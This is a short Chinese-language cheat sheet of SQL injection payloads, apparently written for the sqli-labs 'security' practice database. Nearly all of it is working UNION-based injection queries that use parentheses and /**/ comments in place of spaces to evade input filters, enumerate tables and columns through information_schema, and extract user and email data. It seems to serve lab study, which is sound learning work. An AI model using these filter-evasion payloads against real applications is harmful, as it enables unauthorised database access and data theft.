sql绕过

use security;
#()绕过空格，查表
#way1:union子查询
select id,username,password from users where id=1 or 1=1 union(select 2,(select (group_concat(table_name))from(information_schema.tables)
where(table_schema='security')),3);
#way2:union普通查询（更简单）
select id,username,password from users where id=1 or 1=1 union(select 2,group_concat(table_name),3 from(information_schema.tables)
where(table_schema='security'));

#/**/绕过空格,查表
#way1:union子查询
select id,username,password from users where id=1 or 1=1 union/**/select 2,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/
where/**/table_schema='security'),3;
#way2:union普通查询（更简单）
select id,username,password from users where id=1 or 1=1 union/**/select 2,3,/**/group_concat(table_name)/**/from/**/information_schema.tables
where/**/table_schema='security';

select id,username,password from users where id=1 or 1=1 order by 3;

select 1,group_concat(table_name),3 from information_schema.tables
where table_schema=database();#作用是查某个数据库中的所有表(语句原理:查某表某字段的所有内容)，group_concat函数将多行结果连接为一行
select 1,group_concat(column_name),3 from information_schema.columns
where table_name='users';#作用是查表的所用列

 

#()绕过空格，查所有列
select id,username,password from users where id=1 or 1=1 union(select(1),(select(group_concat(id))from(emails)),3);

#()绕过空格，查字段具体数据
select * from users where id='1' or 1=1 union(select 1,(select group_concat(email_id)from(emails)),2);